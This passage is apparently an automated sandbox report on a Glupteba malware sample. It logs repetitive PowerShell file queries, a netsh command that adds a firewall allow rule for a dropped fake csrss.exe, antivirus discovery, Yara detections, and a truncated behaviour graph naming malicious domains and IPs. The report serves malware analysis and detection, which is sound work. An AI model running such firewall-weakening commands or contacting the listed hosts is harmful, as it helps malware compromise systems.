Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe Queries volume information: C:\Users\user\AppData\Local\Temp\csrss\tor\torrc VolumeInformation
Source: C:\Windows\rss\csrss.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Modifies the windows firewall
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
AV process strings found (often used to terminate AV products)
Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: msmpeng.exe
Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Glupteba
Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Glupteba
Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 877005 Sample: kdsyitkxmS.exe Startdate: 28/05/2023 Architecture: WINDOWS Score: 100 117 stun.stunprotocol.org 2->117 119 server5.duniadekho.bar 2->119 121 7 other IPs or domains 2->121 139 Snort IDS alert for network traffic 2->139 141 Antivirus detection for URL or domain 2->141 143 Antivirus detection for dropped file 2->143 149 7 other signatures 2->149 12 kdsyitkxmS.exe 13 2->12         started        15 csrss.exe 2->15         started        17 csrss.exe 2 2->17         started        19 4 other processes 2->19 signatures3 145 Performs DNS TXT record lookups 117->145 147 Uses STUN server to do NAT traversial 119->147 process4 dnsIp5 171 Detected unpacking (changes PE section rights) 12->171 173 Modifies the windows firewall 12->173 175 Drops PE files with benign system names 12->175 22 kdsyitkxmS.exe 1 2 12->22         started        26 powershell.exe 24 12->26         started        28 cmd.exe 15->28         started        30 cmd.exe 2 17->30         started        123 51.159.136.111 OnlineSASFR France 19->123 125 62.210.99.238 OnlineSASFR France 19->125 127 3 other IPs or domains 19->127 32 csrss.exe 19->32         started        34 powershell.exe 19->34         started        signatures6 process7 file8 115 C:\Windows\rss\csrss.exe, PE32 22->115 dropped 163 Creates an autostart registry key pointing to binary in C:\Windows 22->163 36 csrss.exe 7 27 22->36         started        41 cmd.exe 1 22->41         started        51 3 other processes 22->51 43 